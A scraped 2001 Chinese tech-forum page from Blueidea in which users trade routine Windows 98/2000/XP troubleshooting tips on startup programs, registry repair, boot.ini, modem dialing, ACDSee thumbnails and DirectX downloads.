 发表于 2001-11-13 06:41:53 按此观看Quester的个人资料 按此发邮件给Quester 发送悄悄话给Quester 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Quester的IP
开始→程序→ 附件→ 系统工具→ 系统信息

菜单→ 工具→ 系统文件检查器→ 恢复单个文件→ 从安装盘恢复文件

下载 ColorKey 试用版 解决配色问题
逢对手鼠标说话，仗一键快意恩仇！
...乍暖還寒時候，最難將息...
Blueidea Web Team
Moderator of Art & Design
上一贴 | 下一贴
快速回复 | 主题：我的电脑在安装新软件的时候出现这样的提示
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请教！！！WIN2000中系统资源在什么地方！！

计算机技术
请教！！！WIN2000中系统资源在什么地方！！

上一贴 | 下一贴
发表人 | 主题: 请教！！！WIN2000中系统资源在什么地方！！
秋雁 超级用户 积分：408 发帖：125 来自：江苏 注册：2001-10-30 | 发表于 2001-11-11 15:42:38 按此观看秋雁的个人资料 按此发邮件给秋雁 访问秋雁的主页 秋雁 的 oicq 是5480510,查看 5480510 的资料 收藏该主题供以后查看 发送悄悄话给秋雁 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看秋雁的IP 如题！！！ ********************************* * 买论坛，空间，域名 就找我 * * 特别优惠供应，联系QQ 5480510 * *********************************
zhumk 解答最细致奖 积分：796 发帖：126 来自：湖北省十堰市 注册：2000-07-20 | 发表于 2001-11-12 08:08:49 按此观看zhumk的个人资料 按此发邮件给zhumk 访问zhumk的主页 zhumk 的 oicq 是38483182,查看 38483182 的资料 发送悄悄话给zhumk 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zhumk的IP 在任务栏中点击鼠标右键，出现[任务管理器......]，其中的信息可比win98中多很多，虽然没有在win98中的用户资源和系统资源等项目，但是显示的信息也足够了。 [这消息被zhumk编辑过(编辑时间2001-11-12 08:07:12)] -------------------------------------------- 好好学习，天天向上 -------------------------------------------- ASP/ASP.NET/VStudio.NET/XML
上一贴 | 下一贴
快速回复 | 主题：请教！！！WIN2000中系统资源在什么地方！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


用2000和XP的痛苦！！！

计算机技术
用2000和XP的痛苦！！！

上一贴 | 下一贴
发表人 主题: 用2000和XP的痛苦！！！
legendbb

初级用户
积分：41
发帖：11
来自：上海
注册：2001-11-07
 发表于 2001-11-08 00:30:52 按此观看legendbb的个人资料 按此发邮件给legendbb 访问legendbb的主页 legendbb 的 oicq 是34221840,查看 34221840 的资料 收藏该主题供以后查看 发送悄悄话给legendbb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看legendbb的IP
w2k下，modem开始只显示端口连接速度112.5k不能显示网络实际速度。
xp下，系统总是自动拨号，关闭IE选项也没用。
我用的是ASUS的笔记本，全内置，太痛苦了。请帮忙。

legendbb
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-11-08 01:14:04 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
2k下面，有的猫是这样，有的猫不是这样，这样也没什么，你管它真实速度干什么，又不能有所改变。
xp下面，也是因为你动过一个设置才会这样，我以前也遇过，解决方法是新建一个用户，然后把当前的用户删除了，新建的用户就又是默认设置了，不会乱拨号了。

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

cola

终级用户
积分：1312
发帖：775
来自：
注册：2000-02-27
 发表于 2001-11-08 09:15:51 按此观看cola的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给cola 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cola的IP
你可能用的是win2k自带通用的驱动吧，好象得装上猫专门的驱动后才能显示速率

It is our loading program. We can load anything from clothes, to weapons, to training simulations.Anything we need.
晓东

高级用户
积分：176
发帖：183
来自：理想空间
注册：2001-09-28
 发表于 2001-11-08 18:06:16 按此观看晓东的个人资料 按此发邮件给晓东 访问晓东的主页 晓东 的 oicq 是1263524,查看 1263524 的资料 发送悄悄话给晓东 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看晓东的IP

如图，选择[从不进行拨号链接]即可解决

理想论坛　www.15m.com/winbbs
君不见
黄河之水天上来，忽如一夜春风来
铁马冰河入梦来，千金散尽还复来......
DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2001-11-09 11:05:24 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
我的2000猫也拨112，很慢···

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

上一贴 | 下一贴
快速回复 | 主题：用2000和XP的痛苦！！！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


有没有win2000下控制启动程序的软件？

计算机技术
有没有win2000下控制启动程序的软件？

上一贴 | 下一贴
发表人 主题: 有没有win2000下控制启动程序的软件？
cinkey

我和我追逐的梦
积分：1132
发帖：2183
来自：杭州
注册：2001-06-21
 发表于 2001-11-06 20:00:05 按此观看cinkey的个人资料 按此发邮件给cinkey 访问cinkey的主页 cinkey 的 oicq 是23516844,查看 23516844 的资料 收藏该主题供以后查看 发送悄悄话给cinkey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cinkey的IP
就是象win98下的msconfig
我记得有，不过忘记在哪里下载了？谁能告诉我？

 悠長假期   |  反恐联盟  |  CS服务器状态查看  |  CS反作弊客户端
Fly

Developer
积分：3998
发帖：995
来自：
注册：2001-10-31
 发表于 2001-11-06 20:11:25 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
如何安装有WIN98或ME的话，直接用原来的就可以，不过会出现一个错误的提示框，不理它就可以改，不行的话，去下载一个魔法兔子来改，也可以

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

2smile

活着就好
积分：1622
发帖：1907
来自：SD
注册：2001-05-13
 发表于 2001-11-06 20:13:36 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
win2k msconfig

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
cinkey

我和我追逐的梦
积分：1132
发帖：2183
来自：杭州
注册：2001-06-21
 发表于 2001-11-06 20:23:02 按此观看cinkey的个人资料 按此发邮件给cinkey 访问cinkey的主页 cinkey 的 oicq 是23516844,查看 23516844 的资料 发送悄悄话给cinkey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cinkey的IP
多谢多谢

 悠長假期   |  反恐联盟  |  CS服务器状态查看  |  CS反作弊客户端
crystal

水晶
积分：2499
发帖：2822
来自：QUAKE
注册：2000-01-30
 发表于 2001-11-06 20:28:08 按此观看crystal的个人资料 该用户不允许显示它的电子邮件 访问crystal的主页 crystal 的 oicq 是1073810,查看 1073810 的资料 发送悄悄话给crystal 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看crystal的IP
windows优化大师也可以

书山有路勤为径，学海无涯苦作舟　　Current Project : JSP Nuke
actionscript

初级用户
积分：148
发帖：38
来自：Wuhan,P.R.C.
注册：2001-11-06
 发表于 2001-11-07 00:34:51 按此观看actionscript的个人资料 按此发邮件给actionscript 访问actionscript的主页 actionscript 的 oicq 是629489,查看 629489 的资料 发送悄悄话给actionscript 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看actionscript的IP
直接改注册表：
HKEY_LOCAL_MACHINE\software\micro$oft\windowsnt\current version\run
runonce
run-
HKEY_LOCAL_USER\...

故国神游，多情应笑我，早生华发。
上一贴 | 下一贴
快速回复 | 主题：有没有win2000下控制启动程序的软件？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


一直有这么一个问题解决不了

计算机技术
一直有这么一个问题解决不了

上一贴 | 下一贴
发表人 主题: 一直有这么一个问题解决不了
飞扬

逆风飞扬
艺设版主
积分：2527
发帖：2620
来自：经典.北京
注册：2000-11-09
 发表于 2001-12-01 21:18:50 按此观看飞扬的个人资料 按此发邮件给飞扬 访问飞扬的主页 飞扬 的 oicq 是762784,查看 762784 的资料 收藏该主题供以后查看 发送悄悄话给飞扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看飞扬的IP
realplayer
这软件好是好,就是一启动来自动启动了,在注册表的启动中把它删除了,但是一在网上播放影片自动启动过这软件后,每次开机它又自动的启动了!!

说是可以在首选项中选择开机不启动,但是找不到,大家帮我看看~~

啊 . 咪 . 哩 . 哟 . 哎 . 吗 . 哈 . 呀 . 哦 . 咦 . 嚓 . 唙 . 嘻 . 啦

Blueidea Web Team
Moderator of Art + Design Forum

张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-01 22:02:35 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
首选项里面有一个startcenter，进入它的设置，然后把勾去掉就可以了。

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

风云突变

终级用户
积分：637
发帖：141
来自：风云工作室
注册：2001-12-01
 发表于 2001-12-01 22:07:35 按此观看风云突变的个人资料 按此发邮件给风云突变 风云突变 的 oicq 是5477342,查看 5477342 的资料 发送悄悄话给风云突变 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风云突变的IP
视图－首选项－常规－StartCenter－设置

把 “启动 StartCenter” 前面的钩去掉即可

N神
幽灵

超级用户
积分：358
发帖：216
来自：上海
注册：2001-02-25
 发表于 2001-12-02 22:59:29 按此观看幽灵的个人资料 按此发邮件给幽灵 幽灵 的 oicq 是15868256,查看 15868256 的资料 发送悄悄话给幽灵 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看幽灵的IP
风云大哥，你也到这边来了啊！嘻嘻！

上帝会保佑我的，一切都会有的！
风云突变

终级用户
积分：637
发帖：141
来自：风云工作室
注册：2001-12-01
 发表于 2001-12-02 23:31:06 按此观看风云突变的个人资料 按此发邮件给风云突变 风云突变 的 oicq 是5477342,查看 5477342 的资料 发送悄悄话给风云突变 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风云突变的IP
幽灵在上个帖子中说
引用:
风云大哥，你也到这边来了啊！嘻嘻！

呵呵，无忧我上不去，只好来这儿混混了（Sorry 借地方聊几句）

N神
上一贴 | 下一贴
快速回复 | 主题：一直有这么一个问题解决不了
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请教：安装win2k时....

计算机技术
请教：安装win2k时....

上一贴 | 下一贴
发表人 | 主题: 请教：安装win2k时....
ocean 终级用户 积分：485 发帖：280 来自： 注册：2000-06-17 | 发表于 2001-11-22 10:58:54 按此观看ocean的个人资料 按此发邮件给ocean ocean 的 oicq 是5423204,查看 5423204 的资料 收藏该主题供以后查看 发送悄悄话给ocean 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ocean的IP 未安装成功，机器每次启动都默认为继续安装，怎样在多系统选单中删除继续安装项。 ..::一蓑烟雨任平生::..
糊锅巴 终级用户 积分：462 发帖：132 来自：北京 注册：2001-08-07 | 发表于 2001-11-22 11:21:51 按此观看糊锅巴的个人资料 按此发邮件给糊锅巴 访问糊锅巴的主页 糊锅巴 的 oicq 是919288,查看 919288 的资料 发送悄悄话给糊锅巴 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看糊锅巴的IP C：盘根目录下面有个boot.ini 不过是隐藏的，你可以在DOS提示符下用edit boot.ini来编缉。 我靠！
ocean 终级用户 积分：485 发帖：280 来自： 注册：2000-06-17 | 发表于 2001-11-22 15:57:17 按此观看ocean的个人资料 按此发邮件给ocean ocean 的 oicq 是5423204,查看 5423204 的资料 发送悄悄话给ocean 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ocean的IP 搞定，谢谢！ ..::一蓑烟雨任平生::..
上一贴 | 下一贴
快速回复 | 主题：请教：安装win2k时....
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


注册表问题

计算机技术
注册表问题

上一贴 | 下一贴
发表人 主题: 注册表问题
画外音

初级用户
积分：28
发帖：34
来自：
注册：2000-09-24
 发表于 2001-11-08 10:49:29 按此观看画外音的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给画外音 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看画外音的IP
不知道是硬盘故障还是其它什么原因,我的WIN98系统中的注册表经常会丢失一些信息.
重新启动计算机的时候,它会自动恢复到某个它默认的注册表状态.

例如,安装ACROBAT后,需要虚拟打印机出来,如果不重新启动计算机,这个虚拟的打印机
就存在,当重新启动计算机以后,打印机就处在未安装状态.

结果现在我如果想使用ACROBAT,就需要重新安装它,然后不选择重新启动

请问在不重新安装WIN98系统的前提下,
我该如何做才能固定注册表信息?

张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-11-08 11:08:09 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
可在安装软件后，保存一份注册表，然后下次用，导入保存的注册表。
试一下，这种方法我也不知道可以不可以，而且也没有根本的解决注册表的保存。
关于windows，太多的不解和疑惑了……

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-08 11:19:46 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
找个软件锁下注册表试试

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
luckboy1017

初级用户
积分：20
发帖：8
来自：
注册：2001-11-08
 发表于 2001-11-08 11:41:27 按此观看luckboy1017的个人资料 按此发邮件给luckboy1017 发送悄悄话给luckboy1017 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看luckboy1017的IP
在系统工具中，有系统配置程序，注册表检测可
画外音

初级用户
积分：28
发帖：34
来自：
注册：2000-09-24
 发表于 2001-11-08 12:30:53 按此观看画外音的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给画外音 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看画外音的IP
张无忌在上个帖子中说
引用:
可在安装软件后，保存一份注册表，然后下次用，导入保存的注册表。
试一下，这种方法我也不知道可以不可以，而且也没有根本的解决注册表的保存。
关于windows，太多的不解和疑惑了……

对于普通程序,这个方法是可行的.
但是ACROBAT不可以.
因为它需要计算机重新启动才可以.
安装完以后有虚拟打印机,导出保存注册表也没问题.
但是计算机重新启动后,虚拟打印机就没有了.
导入注册表也不会有.
画外音

初级用户
积分：28
发帖：34
来自：
注册：2000-09-24
 发表于 2001-11-08 12:33:11 按此观看画外音的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给画外音 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看画外音的IP
luckboy1017在上个帖子中说
引用:
在系统工具中，有系统配置程序，注册表检测可

可否再详细些说说?

Quester

鼠标说话
是个版主
积分：2604
发帖：1175
来自：GTA
注册：2000-08-28
 发表于 2001-11-08 12:55:36 按此观看Quester的个人资料 按此发邮件给Quester 发送悄悄话给Quester 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Quester的IP
就是 —— 关闭 注册表扫描程序，使其不自动恢复到上次安装状态，

然后重新启动，安装所需软件或者驱动，

再次重新启动，F8 到命令行状态，运行 windows系统目录下的 Scanreg 程序

比如：

c:\windows\system\scanreg /Fix

修复注册表中的错误即可。

正常启动到windows，将注册表扫描程序打开。（如果你不放心，也可以关闭之）

下载 ColorKey 试用版 解决配色问题
逢对手鼠标说话，仗一键快意恩仇！
...乍暖還寒時候，最難將息...
Blueidea Web Team
Moderator of Art & Design
画外音

初级用户
积分：28
发帖：34
来自：
注册：2000-09-24
 发表于 2001-11-08 14:01:40 按此观看画外音的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给画外音 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看画外音的IP
对不起.我没有找到你说的
系统工具中，有系统配置程序，注册表检测—— 关闭 注册表扫描程序

我找到的是
系统工具--系统信息--工具--注册表检查程序

但是找不到关闭它的选项.
可以再告诉我吗?谢谢.

windangel

终级用户
积分：1258
发帖：609
来自：风之国度
注册：2001-02-28
 发表于 2001-11-08 15:55:02 按此观看windangel的个人资料 按此发邮件给windangel 访问windangel的主页 windangel 的 oicq 是870777,查看 870777 的资料 发送悄悄话给windangel 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看windangel的IP
1 干脆就禁止修改注册表，安装后再解除。

2 使用诺顿一类的工具软件，检查注册表错误关联！

Blueidea Web Team
Moderator Of multimedia forum
上一贴 | 下一贴
快速回复 | 主题：注册表问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


acdsee系列怎么有通病呀

计算机技术
acdsee系列怎么有通病呀

上一贴 | 下一贴
发表人 主题: acdsee系列怎么有通病呀
aarondc

超级用户
积分：446
发帖：141
来自：bj
注册：2000-09-05
 发表于 2001-11-27 11:20:20 按此观看aarondc的个人资料 按此发邮件给aarondc 访问aarondc的主页 aarondc 的 oicq 是301221,查看 301221 的资料 收藏该主题供以后查看 发送悄悄话给aarondc 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看aarondc的IP
记得我是3.X版本时，用着用着，浏览多图时，就看不到多图的缩略图了
我的mode明明时thumbnails模式呀
这回上了四代也有这个毛病出现了，重装也不管用
有解决的方法吗？

i like sega

http://www.ibolservice.com/images/shadow.jpg

天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-11-27 11:59:58 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
我也遇到这个问题！我想没有解决方法

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-11-27 12:06:35 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
还是用acdsee32吧，又小又稳定速度又快。

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

冷语

Fierce
现任版主
积分：13250
发帖：5007
来自：BeiJing
注册：2001-03-06
 发表于 2001-11-27 13:17:17 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP
还是喜欢ACDsee2.42

[ Come As You Are ]

Blueidea Web Team
Moderator Of Flash forum

zy2003

超级用户
积分：376
发帖：143
来自：
注册：2001-10-09
 发表于 2001-11-27 13:26:44 按此观看zy2003的个人资料 按此发邮件给zy2003 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP
我的acd4可以看啊

[img]http://51abc.net/banner/banner2.gif[/img]
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-27 14:08:44 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
有些版本的acdsee4破解有问题的~ 不是不能再次安装就是不能预览~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-11-27 18:45:29 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
ACDSee32就是ACDSee ,最新的是ASDSee32 4.0版！

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
QUESTER

鼠标说话
是个版主
积分：2604
发帖：1175
来自：GTA
注册：2000-08-28
 发表于 2001-11-28 12:58:13 按此观看QUESTER的个人资料 按此发邮件给QUESTER 发送悄悄话给QUESTER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看QUESTER的IP
默认值是进入目录后自动搜索文件头生成缩图，若你目录下多图且大，或者在zip里有图，就直接影响生成速度。
你若嫌它麻烦，可以在选项里面关闭自动读取文件头的选项，以保持速度。

下载 ColorKey 试用版 解决配色问题
逢对手鼠标说话，仗一键快意恩仇！
...乍暖還寒時候，最難將息...
Blueidea Web Team
Moderator of Art & Design
sunbird

阳光小鸟
积分：1395
发帖：573
来自：北京
注册：2000-06-16
 发表于 2001-11-28 13:21:46 按此观看sunbird的个人资料 按此发邮件给sunbird 访问sunbird的主页 sunbird 的 oicq 是2113352,查看 2113352 的资料 发送悄悄话给sunbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sunbird的IP
设成不保存缩略图，就不会有这个问题，但是会降低浏览速图...

sUPER unbird　[._.]
iris

终级用户
积分：1088
发帖：358
来自：Beijing
注册：2000-10-31
 发表于 2001-11-28 22:34:20 按此观看iris的个人资料 按此发邮件给iris iris 的 oicq 是15602095,查看 15602095 的资料 发送悄悄话给iris 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看iris的IP
用 database 菜单下的 maintenance 重新整理 (3.x版)

  Iris is Iris
jeepstar

终级用户
积分：641
发帖：313
来自：温州@苏州
注册：2000-11-14
 发表于 2001-11-29 14:44:04 按此观看jeepstar的个人资料 按此发邮件给jeepstar jeepstar 的 oicq 是32230978,查看 32230978 的资料 发送悄悄话给jeepstar 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jeepstar的IP
冷语在上个帖子中说
引用:
还是喜欢ACDsee2.42

我现在还在用2.42版本啊！！！真的不错啊 ！！我觉着不用升级啊！！！
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-29 15:04:01 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
偶用软件原则有什么需要就用什么版本的不一定要最新版.
大家看看acdsee几个版本的功能哪些是你需要的呢?如果单单
为了看图2.4的也就能用了.又快又好:0

acdsee2.4普通功能
自动播放方式欣赏图片
图片设成屏幕壁纸
图片格式转换

3.1 acdsee功能列表
扫描图片并顺序命名
文件批量更名
制作HTML相册
制作文件清单
成批移动或复制文件
成批转换图片格式
图片编辑加工
功能使用方法查看
http://www.4gee.com/colleges/photo/048.htm

acdsee4 功能列表
广泛应用于图片的获取、管理、浏览、优化甚至和他人
的分享！使用ACDSee，你可以从数码相机和扫描仪高效
获取图片，并进行便捷的查找、组织和预览。超过50种
常用多媒体格式被一网打尽！作为最重量级看图软件，
它能快速、高质量显示您的图片，再配以内置的音频
播放器，我们就可以享用它播放出来的精彩幻灯片了。
Acdsee还能处理如Mpeg之类常用的视频文件。此外
ACDSee是您最得心应手的图片编辑工具，轻松处理数
码影像，拥有的功能像去除红眼、剪切图像、锐化、浮
雕特效、曝光调整、旋转、镜像等等，还能进行批量处理,
通过增加声音、文字、定时器及大量过场效果使图像的浏
览变得异常丰富多彩·从影像文件中提取图像和为图像增
加声音等功能·更便捷的图像组织和管理功能·与Windows XP
的100%兼容

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

colorbird

木鱼
经典元老
积分：1077
发帖：670
来自：湖南长沙
注册：2000-06-17
 发表于 2001-11-30 02:26:17 按此观看colorbird的个人资料 按此发邮件给colorbird 访问colorbird的主页 发送悄悄话给colorbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看colorbird的IP
我的Acdsee4.0与以下设备均有冲突：
winamp
pcanywhere
iis 5.0
leapftp

降回3.0版本以后,一切ok.

An active pessimist.
Blueidea Web Team.
Team member
上一贴 | 下一贴
快速回复 | 主题：acdsee系列怎么有通病呀
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


DirectDraw在那下载？

计算机技术
DirectDraw在那下载？

上一贴 | 下一贴
发表人 主题: DirectDraw在那下载？
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-11-27 18:42:49 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 收藏该主题供以后查看 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
DirectDraw在那下载？

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-27 18:56:54 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
天外飞猪在上个帖子中说
引用:
DirectDraw在那下载？

DirectDraw 是Directx的一个部分~ 载个Directx8吧~

http://www8.pconline.com.cn/download/swdetail.phtml?id=15

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
